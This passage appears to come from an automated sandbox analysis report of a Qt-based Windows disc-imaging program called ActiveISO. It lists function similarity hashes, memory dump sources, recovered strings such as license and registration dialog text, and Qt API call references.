                                                                                                                  • API ID: String@@$Data@@$List$Tree$Item@@Widget$?dispose@Data@1@@$?size@Brush@@Url@@Widget@@$?at@?item?path@?pos@?remove@?set?text@?top?urls@Array@@Background@BrushBrush@@@ByteComponentDropEmpty@Event@@Flags@FormattingItem@LevelList@Long@MimeOption@Point@@Point@@@Qt@@@Style@Url@@@@Url@@@@@V0@$$V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3936100387-0
                                                                                                                  • Opcode ID: 7f266698f3719a32d30b0c624ff02a011ef62a8e4bff11dff2cdd8448549721d
                                                                                                                  • Instruction ID: 10034e4332bb960be2a1b14ffc9087c4d5dd4cdc29a04673e63271eb4cbbe588
                                                                                                                  • Opcode Fuzzy Hash: 7f266698f3719a32d30b0c624ff02a011ef62a8e4bff11dff2cdd8448549721d
                                                                                                                  • Instruction Fuzzy Hash: BF815A22F25A4296EB109F65D8961BD2363FF45F99B894031DA0EF3664DF3CE849C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?arg@Char@@Latin1$?fromArrayAscii_helper@Data@Typed
                                                                                                                  • String ID: %1.%2$%1.%2.%3$gfff
                                                                                                                  • API String ID: 2162233684-171313132
                                                                                                                  • Opcode ID: 93c91d02ac9b654338b8cfbd545f78c731855ecee6eab33ee3aac6a41a0ecc99
                                                                                                                  • Instruction ID: 15494876dd12179644d850302d46755c96e298da26533af68235f52fd63571b3
                                                                                                                  • Opcode Fuzzy Hash: 93c91d02ac9b654338b8cfbd545f78c731855ecee6eab33ee3aac6a41a0ecc99
                                                                                                                  • Instruction Fuzzy Hash: 7E51E522A18A4286E360CF65F892269B722FBD8B44F445135E68FD3FA4DF3CD548C704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?set$Label@@Page@@V0@@Widget@@Wizard$Flags@Layout@@Qt@@@@@String@@@Title@$?add?tr@AlignmentExternalFlag@Layout@Layout@@@Links@MetaObject@@OpenType@Widget@Widget@@@WindowWordWrap@malloc
                                                                                                                  • String ID: Complete$Registration completed successfully.
                                                                                                                  • API String ID: 4012063253-897922405
                                                                                                                  • Opcode ID: dc22ddaa0610be5ecaebabc778d02cb3920fa16a0e8837a2faac6d42525693a6
                                                                                                                  • Instruction ID: 1133a1995481a40ba8085a71c60c1fa39b7d8a5f4c90ed24d235f1994deed9fe
                                                                                                                  • Opcode Fuzzy Hash: dc22ddaa0610be5ecaebabc778d02cb3920fa16a0e8837a2faac6d42525693a6
                                                                                                                  • Instruction Fuzzy Hash: 1C51B022E28B0296EA10DF21F8568796366FF8AF91B495130DD5EB37A4DF3CD108C348
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$File$?fromArrayAscii_helper@Data@Typed$?replace@Array@CaseCharCloseCreateHandleQt@@@Sensitivity@V1@0memset$PointerReadWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1317396653-0
                                                                                                                  • Opcode ID: e5bed80215f2cebe14cf411696cc90fe4936a8f8a37a820df3caf3abfefe781a
                                                                                                                  • Instruction ID: 6a93bd10e7ed33d98caa29c0d7c93285871f184e8c3fcfd633dc4958f8e6e51d
                                                                                                                  • Opcode Fuzzy Hash: e5bed80215f2cebe14cf411696cc90fe4936a8f8a37a820df3caf3abfefe781a
                                                                                                                  • Instruction Fuzzy Hash: 3671F232E28A4286F750CF65F85666A7362FB85F90F580131EA5EB7AA4CF3CD409C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Char@@@Data@Typed$?arg@Char@@Latin1Object@@$?activate@?index?remove@Array@@ByteCaseMetaQt@@@Sensitivity@V0@$$V0@@strncpy
                                                                                                                  • String ID: %s%d%s$):/
                                                                                                                  • API String ID: 1662395473-840496010
                                                                                                                  • Opcode ID: 3d5675fee61603013b3340529685074112e6f0cb5e2ecd5eea092bf8216de3a3
                                                                                                                  • Instruction ID: 4519f18288309bef30a49d34bbae6358e641c0a6dd009fe8539f878de92ccf93
                                                                                                                  • Opcode Fuzzy Hash: 3d5675fee61603013b3340529685074112e6f0cb5e2ecd5eea092bf8216de3a3
                                                                                                                  • Instruction Fuzzy Hash: 9BA1B332E28A8292E7508B24E8973B977A2FB94F50F484131D64EF3A94DF3CD509C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PlainString@@$Edit@@TextText@
                                                                                                                  • String ID: <b>%1</b>: $<font color=red>%1</font>$Error
                                                                                                                  • API String ID: 2461871219-1899453835
                                                                                                                  • Opcode ID: b7a30e35f2dd9d336d47bd1ad1ec0ede6c84f25b0a49ffefdd37753c90610670
                                                                                                                  • Instruction ID: e10155445e93c28e4163a9448026d552c312cbcb0c5974b0c69cb1e42aedff65
                                                                                                                  • Opcode Fuzzy Hash: b7a30e35f2dd9d336d47bd1ad1ec0ede6c84f25b0a49ffefdd37753c90610670
                                                                                                                  • Instruction Fuzzy Hash: 2A51B922E2898296EB50DB60E4923B96362FF85F50F484031D65EF7AA5DF2CD449C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$FileText$File@@Stream@@$Char@@@Flags@OpenPlainString@@@$?arg@?close@?from?get?open@?read?set?tr@All@ArrayAscii_helper@Char@@Data@Device@@Device@@@Device@@@@@Dialog@@Dialog@@@@@Edit@@Flag@Latin1MetaModeName@Object@@Option@Text@TypedV2@11Widget@@
                                                                                                                  • String ID: .licenseActivated$License Response Files (*%1);;All Files (*.*)$Open License File
                                                                                                                  • API String ID: 54198585-343348128
                                                                                                                  • Opcode ID: 999cc8d383009dd90a430d42072e34dd693cda04b85f05d4f163278f49e6587b
                                                                                                                  • Instruction ID: d6b0ced8d4eacb208913c74be01300b0a7f698fd8539f209f013d50d2113009f
                                                                                                                  • Opcode Fuzzy Hash: 999cc8d383009dd90a430d42072e34dd693cda04b85f05d4f163278f49e6587b
                                                                                                                  • Instruction Fuzzy Hash: 3F411232E24A02AAFB10DF70D8556EC2732FB45B59F491131E91EB6AA4DF3CD549C344
                                                                                                                  APIs
                                                                                                                  • ??0QDialog@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E74C
                                                                                                                    • Part of subcall function 00007FF65371F710: ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000000,00007FF653717BC1), ref: 00007FF65371F719
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCA4
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??1QString@@QEAA@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCB5
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCCE
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCDB
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??1QString@@QEAA@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCE6
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setWindowModality@QWidget@@QEAAXW4WindowModality@Qt@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCF4
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD08
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD1D
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setMinimumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD29
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD3E
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setMaximumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD4A
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD6A
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD99
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FDA6
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??1QString@@QEAA@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FDB1
                                                                                                                    • Part of subcall function 00007FF65372FC80: ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF65372FDD1
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF65372FDDD
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setFrameShape@QFrame@@QEAAXW4Shape@1@@Z.QT5WIDGETS ref: 00007FF65372FDEB
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?setFrameShadow@QFrame@@QEAAXW4Shadow@1@@Z.QT5WIDGETS ref: 00007FF65372FDF9
                                                                                                                    • Part of subcall function 00007FF65372FC80: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65372FE10
                                                                                                                  • ?setWindowFlags@QWidget@@QEAAXV?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E78B
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E79F
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                    • Part of subcall function 00007FF65373B660: ??0QDialog@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373B67A
                                                                                                                    • Part of subcall function 00007FF65373B660: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65373B69A
                                                                                                                    • Part of subcall function 00007FF65373B660: ?setTextFormat@QLabel@@QEAAXW4TextFormat@Qt@@@Z.QT5WIDGETS ref: 00007FF65373B6B3
                                                                                                                    • Part of subcall function 00007FF65373B660: ?setWindowFlags@QWidget@@QEAAXV?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373B6C1
                                                                                                                    • Part of subcall function 00007FF65373B660: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373B6D5
                                                                                                                    • Part of subcall function 00007FF65373B660: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373B708
                                                                                                                    • Part of subcall function 00007FF65373B660: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF65373B727
                                                                                                                    • Part of subcall function 00007FF65373B660: ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF65373B746
                                                                                                                    • Part of subcall function 00007FF65373B660: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65373B757
                                                                                                                    • Part of subcall function 00007FF65373B660: ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF65373B775
                                                                                                                    • Part of subcall function 00007FF65373B660: ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373B7AF
                                                                                                                    • Part of subcall function 00007FF65373B660: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373B7BA
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E7E7
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E7F2
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FE8
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FEE
                                                                                                                  • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E80E
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ??0QObject@@QEAA@PEAV0@@Z.QT5CORE ref: 00007FF65371BDCD
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FF65371BDE1
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65371BDEE
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65371BDF8
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E869
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E874
                                                                                                                    • Part of subcall function 00007FF6537351C0: ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000000,00007FF65372E892,?,?,?,?,?,00007FF6537225BE), ref: 00007FF6537351C9
                                                                                                                    • Part of subcall function 00007FF6537351C0: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FF65372E892,?,?,?,?,?,00007FF6537225BE), ref: 00007FF6537351DD
                                                                                                                    • Part of subcall function 00007FF6537351C0: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FF65372E892,?,?,?,?,?,00007FF6537225BE), ref: 00007FF6537351E7
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E8BC
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E8C7
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E8F3
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372E8FE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@$Widget@@$String@@$?set$Connection@MetaType@$Window$Flags@Qt@@@$?connect@ConnectionQt@@@@@$?resize@Object@@@$?fromName@Utf8@$?move@Concurrency::cancel_current_taskDialog@@Format@FrameFrame@@Label@@Modality@ObjectPoint@@@Size@Size@@Size@@@String@@@TextThread@@Timer@@$?object?sharedArrayData@@Geometry@MaximumMinimumNull@Rect@@Rect@@@Shadow@Shadow@1@@Shape@Shape@1@@V0@@malloc
                                                                                                                  • String ID: 1get_CD_DVD_devices_complette()$1makeISOfromCD_Finished(int)$1needStopOperation()$1setProgressBarProc(int)$2get_CD_DVD_devices_complette()$2makeISOfromCD_Finished(int)$2needStopOperation()$2setProgressBarProc(int)
                                                                                                                  • API String ID: 2375498392-278036660
                                                                                                                  • Opcode ID: e26f29b79a8ae02fbeaa072e6cd544e92793a2f2f6c0fadd7aac3ab4c720e398
                                                                                                                  • Instruction ID: 9c6cdc2299e3af33238ee94002fcd97c7bda72a3f38aed64cddfd4dd13f5f875
                                                                                                                  • Opcode Fuzzy Hash: e26f29b79a8ae02fbeaa072e6cd544e92793a2f2f6c0fadd7aac3ab4c720e398
                                                                                                                  • Instruction Fuzzy Hash: B9515132A29B8286FB109F51F8451AAB3A5FB89F94F440136DA8DB3B64DF7CD105C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Tree$Char@@@DateWidget$?setItem@@Time@@$?arg@?fromArrayAscii_helper@Char@@Data@Latin1TypedWidget@@$?currentCurrentIcon@Icon@@@Item@Item@@@String@String@@@Text@Time@V2@@malloc
                                                                                                                  • String ID: %1 %2$hh:mm:ss
                                                                                                                  • API String ID: 690401489-1288194447
                                                                                                                  • Opcode ID: 301829f60e41941e3c790fe8123b7e9cbc95e71c376056b06f6ab3f0b718a790
                                                                                                                  • Instruction ID: 2cd1b03dcaa8b15d8cfda3b752a67b4b027167ee438cd7a1f68fecde0a3bd0bf
                                                                                                                  • Opcode Fuzzy Hash: 301829f60e41941e3c790fe8123b7e9cbc95e71c376056b06f6ab3f0b718a790
                                                                                                                  • Instruction Fuzzy Hash: 86418622E29B8296E750CB61E8922B96322FBC5F81F895031D94EF3B64DF3CD548C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
